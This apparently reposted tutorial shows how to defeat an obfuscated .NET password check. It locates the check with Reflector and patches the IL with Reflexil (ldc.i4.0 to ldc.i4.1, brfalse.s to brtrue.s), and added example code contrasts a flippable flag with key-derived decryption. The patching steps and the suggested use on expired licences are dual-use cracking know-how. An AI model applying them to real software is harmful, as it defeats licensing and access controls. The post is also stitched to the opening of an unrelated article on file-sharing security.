Reverse engineering compiler-generated code is difficult and time-consuming, and it gets worse when the code is encrypted or obfuscated. Such code is deliberately transformed to resist analysis by reverse engineers. Some situations in which obfuscation is applied are as follows:</div>
<ul>
<li><strong>Protection of intellectual property</strong>—Commercial software is typically protected against unauthorized duplication, and obfuscation is added on top to obscure the implementation details of crucial parts of that mechanism.</li>
<li><strong>Digital Rights Management</strong>—DRM schemes in contemporary applications commonly protect crucial pieces of information (e.g., protocols and cryptographic keys) with obfuscation.</li>
<li><strong>Malware</strong>—Malware authors obfuscate their code to evade signature-based anti-virus detection.</li>
</ul>
<div style="margin-bottom: 20px;">
Let’s consider the following sample application, which first asks for a password before letting the user in. It manages classified information about secret agents, and only highly privileged personnel holding the secret keys can access those details.</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo2.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo2.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.1</em></div>
<div style="margin-bottom: 20px;">
We have obtained this software from a disgruntled employee, but we don’t have the list of access keys needed to log in. The only option left is to reverse engineer it, either to reveal the password or to identify the code that enforces it so that we can subvert the authentication mechanism altogether. First, determine the platform the software is built on, that is, the type of executable we are dealing with. CFF Explorer can extract such details as follows:</div>
<div style="margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo3.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo3.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.2</em></div>
<div style="margin-bottom: 20px;">
Great!! This software is built for the .NET CLR. A .NET assembly is normally easy to take apart with tools such as ILSpy, Reflector and ILDASM: the first two decompile the binary back to C#-like source, and ILDASM disassembles it to IL text. As we stated in earlier <a href="http://resources.infosecinstitute.com/articles/" style="color: rgb(51, 51, 51) !important; text-decoration: none;" title="articles">articles</a>, ILDASM can dump the IL assembly code of an executable, and modified IL can be recompiled under a different name using ILASM.exe. ILDASM does not save us here, however: the assembly has been protected against it (obfuscators commonly do this with the <em>SuppressIldasmAttribute</em>, which ILDASM honors), so it refuses to disassemble the binary, as follows:</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo4.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo4.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.3</em></div>
<div style="margin-bottom: 20px;">
Reflector or ILSpy come to the rescue here, because unlike ILDASM they decompile to source in a high-level language as well as showing the IL. But we run into another problem, because the software’s intellectual property is protected: Reflector decompiles the classes, methods and properties of this assembly, but in obfuscated form, as follows:</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo5.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo5.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.4</em></div>
<div style="margin-bottom: 20px;">
In figure 1.4 the members of this assembly are displayed as bizarre symbols whose meaning is almost impossible to comprehend. Expanding any class or namespace shows more inexplicable symbols in both panes, and selecting a member in the left pane to view its C# does decompile it, but the result is full of obscure identifiers and bears no visible relation to the functionality we are after.</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo6.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo6.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.5</em></div>
<div style="margin-bottom: 20px;">
Reflector alone does not get us far here, so let’s try another decompiler such as ILSpy. Same result: it also produces C# source code, but in the same obscure form, as follows:</div>
<div style="margin-bottom: 20px; text-align: center;">
<em><img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo7.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo7.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /><br />Figure 1.6</em></div>
<div style="margin-bottom: 20px;">
So decompilation by itself does not help when the binary is obfuscated to resist analysis: the output is syntactically valid, but the identifiers are meaningless stubs and symbols that cannot be translated back into their original form.</div>
<div style="margin-bottom: 20px;">
<strong>Software Functionality Analysis</strong></div>
<div style="margin-bottom: 20px;">
We have the source code of this software, but in obfuscated form, which is useless for further manipulation as it stands; even the decompiled C# gives us little to go on. So we take another approach and examine the behaviour of the software for clues. When the user enters a password and hits the <em>Logon</em> button, the system displays an alert message box saying “Password is Incorrect”, and when the user clicks the <em>OK</em> button in that message box, the application exits. That behaviour is our way in.</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo8.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo8.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.7</em></div>
<div style="margin-bottom: 20px;">
From this behaviour we can draw up a list of things to look for, which will be very helpful when manually tracing the crucial code blocks:</div>
<ul>
<li>Locate <strong>MessageBox.Show</strong> implementation.</li>
<li>Locate <strong>Environment.Exit()</strong> method implementation.</li>
<li>Locate <strong><a href="http://resources.infosecinstitute.com/exception-handling/" style="color: rgb(51, 51, 51) !important; text-decoration: none;" title="Exception Handling">Exception Handling</a> </strong>blocks.</li>
<li>Locate <strong>Hide()</strong> method implementation.</li>
<li>Search string <strong>Password is Incorrect</strong>.</li>
<li>Search string <strong>Access Denied</strong>.</li>
<li>Locate <strong>Text Box</strong> and<strong> Buttons</strong> implementation.</li>
</ul>
<div style="margin-bottom: 20px;">
<strong>Interested Code Block Disassembling</strong></div>
<div style="margin-bottom: 20px;">
We now have a better understanding of code obfuscation; the question is how reverse engineers take up such a challenge. Manual analysis of obfuscated code is hard, because the code is a mass of strange symbols whose meaning is incomprehensible or entirely unrelated to the actual functionality. What tools or tactics do they have at their disposal to break into obfuscated code?</div>
<div style="margin-bottom: 20px;">
Let’s go back to the obfuscated decompilation in Reflector, where the members of this assembly appear as inexplicable symbols. As a rule of thumb, concentrate only on the <em>pink brick</em> icons (methods) in Reflector, because they contain the real code; the rest is of no use for reverse engineering, as follows:</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo9.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo9.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.8</em></div>
<div style="margin-bottom: 20px;">
We identified some points of interest in the analysis above. Now we search the assembly for them using Reflector’s <em>CodeSearch</em> add-on. Make sure the CodeSearch add-on is properly configured in Reflector and open it, then perform the following searches:</div>
<div style="margin-bottom: 20px;">
<strong>Locating MessageBox.Show() method</strong></div>
<div style="margin-bottom: 20px;">
After selecting Deobfus.exe in the left pane, type MessageBox.Show or MessageBox into CodeSearch and hit Enter. It yields a single result, which points to the method in the left pane where the call is made, as follows:</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo10.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo10.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.9</em></div>
<div style="margin-bottom: 20px;">
<strong>Locating Environment.Exit() method</strong></div>
<div style="margin-bottom: 20px;">
Now we search for the <em>Exit</em> keyword and find two results. Clicking either takes us to the method that contains the call, as follows:</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo11.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo11.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.10</em></div>
<div style="margin-bottom: 20px;">
<strong>Locating “Password is Incorrect” string</strong></div>
<div style="margin-bottom: 20px;">
Unfortunately, CodeSearch shows no result for this string, because obfuscators typically encrypt string literals: the plaintext is no longer stored in the assembly and is only decrypted at run time by a helper routine when the message is shown. The framework method names we searched for above, by contrast, cannot be renamed because they are references into the .NET framework, which is why those searches still work.</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo12.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo12.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.11</em></div>
<div style="margin-bottom: 20px;">
<span style="text-decoration: underline;"><span style="color: red;"><strong>Note: </strong></span>CodeSearch is case-sensitive</span></div>
<div style="margin-bottom: 20px;">
<strong>Locating Exception Handling blocks</strong></div>
<div style="margin-bottom: 20px;">
Programmers usually use <em>try/catch</em> blocks to handle unexpected run-time errors, so we search for those. Here we find some interesting code blocks that are very relevant to the actual implementation, as follows:</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo13.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo13.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.12</em></div>
<div style="margin-bottom: 20px;">
<strong>Locating Hide() Method</strong></div>
<div style="margin-bottom: 20px;">
The application is unloaded automatically when the user clicks the OK button in the message box. A search for this keyword again produces very significant results, pointing at the same method as the previous search in figure 1.12.</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo14.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo14.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.13</em></div>
<div style="margin-bottom: 20px;">
From these searches we can conclude that this is the only method in which the password authentication could be coded. Even when the code is obfuscated, pinning down one item of interest leads us to the code we want to reverse or bypass.</div>
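<div style="margin-bottom: 20px;">
The following is an added example, not code from the original article or from Reflector. It models the searches above at the byte level in Python: .NET stores member names in the #Strings heap as NUL-terminated UTF-8 and string literals in the #US heap as length-prefixed UTF-16LE, so two regex passes over a file are enough to show why MessageBox, Show, Exit and Hide are still findable in an obfuscated assembly (they are references into the framework and cannot be renamed) while “Password is Incorrect” is not. The heap fragments, the renamed members and the ciphertext token are constructed for the example; in a real file the heaps are located by parsing the CLI metadata header rather than by scanning everything.</div>

```python
"""Added example (not from the original article): string triage over raw bytes.

Two `strings`-style passes over constructed .NET heap fragments show which
kinds of names survive obfuscation and which do not.
"""
import re

# Constructed stand-ins for heap fragments; these are NOT real PE files.
# #Strings heap: NUL-terminated UTF-8 member names.
STRINGS_HEAP_PLAIN = (
    b"\x00System.Windows.Forms\x00MessageBox\x00Show\x00Environment\x00Exit\x00"
    b"Form\x00Hide\x00LoginForm\x00CheckPassword\x00"
)
# #US heap entries: compressed length prefix (2*chars + 1), UTF-16LE text, one flag byte.
US_HEAP_PLAIN = (
    b"\x00"
    + b"\x2b" + "Password is Incorrect".encode("utf-16-le") + b"\x00"
    + b"\x1b" + "Access Denied".encode("utf-16-le") + b"\x00"
)
# Obfuscated: the assembly's own members are renamed to control characters
# (Reflector shows 0x02 as "STX"), but references into the framework keep their
# names. The literal is gone; what is left in #US is an opaque token that a
# generated helper decrypts at run time (assumed shape, constructed here).
STRINGS_HEAP_OBF = (
    b"\x00System.Windows.Forms\x00MessageBox\x00Show\x00Environment\x00Exit\x00"
    b"Form\x00Hide\x00\x01\x00\x02\x00\x03\x00"
)
US_HEAP_OBF = b"\x00" + b"\x1d" + "nVm2Qk8pHzL0Ys".encode("utf-16-le") + b"\x00"

ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")           # like `strings`
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")    # like `strings -e l`
INTERESTING_APIS = ("MessageBox", "Show", "Exit", "Hide")


def ascii_strings(blob):
    """Printable ASCII runs of 4+ bytes: where member and type names show up."""
    return [m.group().decode("ascii") for m in ASCII_RUN.finditer(blob)]


def utf16_strings(blob):
    """Printable UTF-16LE runs of 4+ chars: where plain string literals show up."""
    return [m.group().decode("utf-16-le") for m in UTF16_RUN.finditer(blob)]


def triage(blob, literal):
    """Report referenced framework APIs, whether the plaintext literal is present,
    whether the binary's own member names survived, and every UTF-16 literal seen."""
    names = ascii_strings(blob)
    literals = utf16_strings(blob)
    return {
        "api_hits": [api for api in INTERESTING_APIS if api in names],
        "literal_found": literal in literals,
        "own_names_readable": "CheckPassword" in names,
        "utf16_literals": literals,
    }


if __name__ == "__main__":
    for label, blob in (("plain", STRINGS_HEAP_PLAIN + US_HEAP_PLAIN),
                        ("obfuscated", STRINGS_HEAP_OBF + US_HEAP_OBF)):
        print(label, triage(blob, "Password is Incorrect"))
```

<div style="margin-bottom: 20px;">
On the plain fragments all four API names, the application’s own CheckPassword and both literals are found; on the obfuscated fragments the API names still come back, but the own member names and the plaintext literal are gone and the only UTF-16 string is the opaque token. That is the same picture CodeSearch gives in figures 1.9 to 1.13: search for framework calls and control flow, not for the message text.</div>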
<div style="margin-bottom: 20px;">
<strong>Cracking Obfuscated Code</strong></div>
<div style="margin-bottom: 20px;">
We have now gathered enough information from the decompiled code to subvert this software’s authentication. We have found the code block that validates the user’s password, as the <em>if</em> condition shows. If the user enters the correct password, the parent form is unloaded and another window, the one that manages the classified information, is brought up.</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo15.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo15.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.14</em></div>
<div style="margin-bottom: 20px;">
These code segments contain everything we are looking for, but one more search makes the reverse engineering easier. The <em>if</em> condition evaluates a Boolean returned by a method call, so the actual password check must live in that method. Searching for the <em>true</em> or <em>false</em> strings via CodeSearch finds it. Bingo!!! It produces the exact method, as follows:</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo16.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo16.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.15</em></div>
<div style="margin-bottom: 20px;">
Now it is time to patch the IL instructions of the identified code to subvert the mechanism. Reflector alone cannot modify IL; its Reflexil add-on can. Higher-level code such as C# is compiled to CIL instructions, which are JIT-compiled to native machine code at run time, so these opcodes are what actually tell the application what to do. In the lower section of figure 1.16, Reflexil shows the CIL corresponding to the C# code in the upper section.</div>
<div style="margin-bottom: 20px;">
Looking through the code and the CIL, we see an interesting instruction at offset 0, <em>ldc.i4.0</em>, which sets the <em>flag</em> value to <em>false</em>. The following instructions compare the passed argument with a predefined value (the password, but in hash form), and finally the method returns the Boolean.</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo17.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo17.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.16</em></div>
<div style="margin-bottom: 20px;">
So there are two patches that subvert this authentication: either permanently set the <em>flag</em> value to <em>true</em> at offset 0, or change the conditional branch at offset 18. Note that the two are not equivalent. Setting the initial value to <em>true</em> makes the method return <em>true</em> whatever argument is compared, whereas swapping <em>brfalse.s</em> for <em>brtrue.s</em> only inverts the test: a wrong password is accepted and the real one is rejected, which is still enough to get in. The edits are:</div>
<ul>
<li><strong>brfalse.s</strong> becomes <strong>brtrue.s</strong> at offset 18</li>
<li><strong>ldc.i4.0</strong> becomes <strong>ldc.i4.1</strong> at offset 0</li>
</ul>
<div style="margin-bottom: 20px;">
To change the instruction at offset 18 to <em>brtrue.s</em>, right-click it and choose the edit option. The following window lets you modify that particular instruction, as follows:</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo18.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo18.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.17</em></div>
<div style="margin-bottom: 20px;">
To make the <em>flag</em> Boolean always <em>true</em>, select the instruction at offset 0 and perform the same operation. Finally, check that the changes look like this:</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo19.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo19.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.18</em></div>
<div style="margin-bottom: 20px;">
There is one more option to subvert this authentication. As we can see, these three lines are most likely responsible for getting input from the user via a text box, which is passed as an argument to the method <strong>this.STX(…)</strong>. Once that function returns either True or False, the condition is evaluated further to determine whether a new window is loaded or a Password Incorrect message is shown. If we delete the section highlighted in figure 1.19, then <strong>this.STX(…)</strong> will never be called or evaluated, and we no longer need to enter the password in order to log in. So delete the lines shown on the right side of figure 1.19.</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo20.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo20.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.19</em></div>
<div style="margin-bottom: 20px;">
Finally, we are done with all the CIL code modifications. Now right-click on the exe and select Reflexil, then Save as. This operation writes the changes permanently into a new patched version of this software, which is free from the authentication limitation.</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo21.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo21.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.20</em></div>
<div style="margin-bottom: 20px;">
Now run the patched exe file. As usual, the authentication dialog opens and asks you to enter the password. Don’t worry, enter any value and hit the <em>Logon</em> button. Bingoooooo!!!! We have bypassed the password check, and now we can access the classified information which was supposed to be available only to authenticated users. So, this is how we can reverse engineer an obfuscated executable by applying an effective analysis approach, even if we don’t know the password and the source code of this exe is obfuscated.</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo22.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo22.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.21</em></div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo23.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo23.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.22</em></div>
<div style="margin-bottom: 20px;">
<strong>Final Note</strong></div>
<div style="margin-bottom: 20px;">
It is relatively easy to reverse engineer a .NET executable when its code is not obfuscated, but decompiling protected code is considered much harder, especially for commercial software whose source code is protected from being analyzed and reverse engineered. In this article, we have performed reverse engineering on a protected binary by deep analysis of both the obfuscated source code and the MSIL assembly code. We have successfully modified the application to subvert authentication, even without having the password. So this is how we can modify a software executable even when its source code is obfuscated, for instance when its license has expired, we have lost the password, or we are subverting another piece of functionality.</div>
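The weak pattern analysed above (a Boolean gate set from a hash comparison, which a single IL change inverts) next to a design in which the password is a key input rather than a branch, as an added C# example that is not the article's code; the class, method names, sample password and payload are constructed, and it assumes .NET 6 or later.

```csharp
using System;
using System.Security.Cryptography;
using System.Text;

// Added example, not the article's code. All names, the sample password
// "s3cret" and the sample payload are constructed for illustration.
public static class AuthPatterns
{
    // Constructed sample: the hash is computed here for convenience; a real
    // binary would embed only the hash, as the article's target does.
    private static readonly byte[] StoredHash = Sha256(Encoding.UTF8.GetBytes("s3cret"));

    // Pattern analysed in the article: a flag starts false (ldc.i4.0), is set
    // by a hash comparison, and the caller branches on the result (brfalse.s).
    // Because the classified data sits in the clear behind this branch,
    // changing either instruction grants access without the password.
    public static bool CheckPasswordFlag(string candidate)
    {
        bool flag = false;                                        // ldc.i4.0
        byte[] h = Sha256(Encoding.UTF8.GetBytes(candidate));
        if (CryptographicOperations.FixedTimeEquals(h, StoredHash))
            flag = true;
        return flag;                                              // branch target
    }

    // Hardened pattern: the password is a key input, not a gate. The payload is
    // stored as AES-GCM ciphertext, so there is no Boolean to flip; a wrong
    // password derives a wrong key and the authentication tag check fails.
    public static string UnlockByDecryption(string candidate, byte[] salt, byte[] nonce,
                                            byte[] ciphertext, byte[] tag)
    {
        byte[] key = DeriveKey(candidate, salt);
        byte[] plaintext = new byte[ciphertext.Length];
        using var aes = new AesGcm(key);
        aes.Decrypt(nonce, ciphertext, tag, plaintext);   // throws CryptographicException on wrong key
        return Encoding.UTF8.GetString(plaintext);
    }

    // Build-time helper: seal the payload under a key derived from the password.
    public static (byte[] salt, byte[] nonce, byte[] ciphertext, byte[] tag)
        Seal(string password, string secretText)
    {
        byte[] salt = RandomNumberGenerator.GetBytes(16);
        byte[] nonce = RandomNumberGenerator.GetBytes(12);   // 96-bit GCM nonce
        byte[] plaintext = Encoding.UTF8.GetBytes(secretText);
        byte[] ciphertext = new byte[plaintext.Length];
        byte[] tag = new byte[16];
        using var aes = new AesGcm(DeriveKey(password, salt));
        aes.Encrypt(nonce, plaintext, ciphertext, tag);
        return (salt, nonce, ciphertext, tag);
    }

    // PBKDF2-HMAC-SHA256, 100k iterations, 256-bit key.
    private static byte[] DeriveKey(string password, byte[] salt)
    {
        using var kdf = new Rfc2898DeriveBytes(password, salt, 100_000, HashAlgorithmName.SHA256);
        return kdf.GetBytes(32);
    }

    private static byte[] Sha256(byte[] data)
    {
        using var sha = SHA256.Create();
        return sha.ComputeHash(data);
    }

    public static void Main()
    {
        Console.WriteLine("flag pattern, correct password: " + CheckPasswordFlag("s3cret"));
        Console.WriteLine("flag pattern, wrong password:   " + CheckPasswordFlag("wrong"));

        var sealedData = Seal("s3cret", "classified: constructed sample text");
        Console.WriteLine("decryption pattern, correct password: " +
            UnlockByDecryption("s3cret", sealedData.salt, sealedData.nonce,
                               sealedData.ciphertext, sealedData.tag));
        try
        {
            UnlockByDecryption("wrong", sealedData.salt, sealedData.nonce,
                               sealedData.ciphertext, sealedData.tag);
        }
        catch (CryptographicException)
        {
            Console.WriteLine("decryption pattern, wrong password: tag mismatch, no plaintext");
        }
    }
}
```

The tag-mismatch path is also the natural place to count and log failed attempts, which the flag pattern never records.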
</div>
<div class="meta-info" style="background-color: white; border-bottom-color: rgb(231, 230, 230); border-bottom-style: solid; border-bottom-width: 1px; border-top-color: rgb(231, 230, 230); border-top-style: solid; border-top-width: 1px; clear: both; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 12px; line-height: 34px; margin-top: 36px; overflow: hidden;">
<a href="http://resources.infosecinstitute.com/encrypted-code-reverse-engineering-bypassing-obfuscation/" target="_blank">http://resources.infosecinstitute.com/encrypted-code-reverse-engineering-bypassing-obfuscation/</a></div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-90976175211820700742014-05-05T18:21:00.002-07:002014-05-05T18:21:55.499-07:00[infosecinstitute] Cloud-Based File Sharing Websites: A Data Security Disaster Waiting to Happen?<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Have you ever stopped to consider the sensitivity and potential value of the information you have distributed using the many widely available file sharing websites?</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
These types of sites have seen considerable uptake in recent years, as users struggle to share large files whilst battling standard email file size and gateway limits imposed by IT departments. Many users would argue that restrictions placed on them by central IT policies leave them with no choice but to look for alternative ways to send ‘must share’ data. However, although these sites may seem easy to use, they also pose a considerable data security and compliancy risk to corporate networks.</div>
<a name='more'></a><br />
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>Understanding the Data Security Threats</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
While many file transfer sites claim to have invested heavily in security and authentication mechanisms designed to keep user data safe, recent stories in the press have caused many to question this:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<a href="http://www.bbc.co.uk/news/technology-26969629" style="color: rgb(51, 51, 51) !important; text-decoration: none;"><span style="color: blue; text-decoration: underline;">www.bbc.co.uk/news/technology-26969629</span></a></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<a href="http://www.computerweekly.com/news/2240160676/Unsafe-password-practices-cause-Dropbox-spam-scare" style="color: rgb(51, 51, 51) !important; text-decoration: none;"><span style="color: blue; text-decoration: underline;">www.computerweekly.com/news/2240160676/Unsafe-password-practices-cause-Dropbox-spam-scare</span></a></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<a href="http://www.computerweekly.com/news/2240204366/Dropbox-can-be-hacked-say-security-researchers" style="color: rgb(51, 51, 51) !important; text-decoration: none;"><span style="color: blue; text-decoration: underline;">www.computerweekly.com/news/2240204366/Dropbox-can-be-hacked-say-security-researchers</span></a></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Typically, security breaches can be traced back to one of the following causes – or in some cases, both.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong><em>Access control</em></strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
By their very nature, consumer file transfer sites have been designed with ease of access in mind. Internal and external access to documents and information enables users to share content and work collectively on files, which in turn offers substantial efficiency and cost-saving potential. However, if insufficient access control mechanisms are put in place, the risks to data protection can be significant.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
In many cases, once a user has gone through the initial authentication process steps, there is nothing to stop them from sharing personal or commercially sensitive data with an extended group of external third parties. Additionally, with no auditing or tracking capabilities, in many cases an organisation’s IT team will have little to no visibility over what information has left the corporate network.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
This reduced control also extends to the types of devices and applications that are used to access the data. With links being forwarded to different email addresses, for instance, sensitive information can be downloaded onto personal laptops. This is not only a concern due to potential malware or viruses existing on these devices, but it also means that individuals can continue to access certain information after they have left a project, or even, the company.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong><em>The hacker / cyber security threat</em></strong></div>
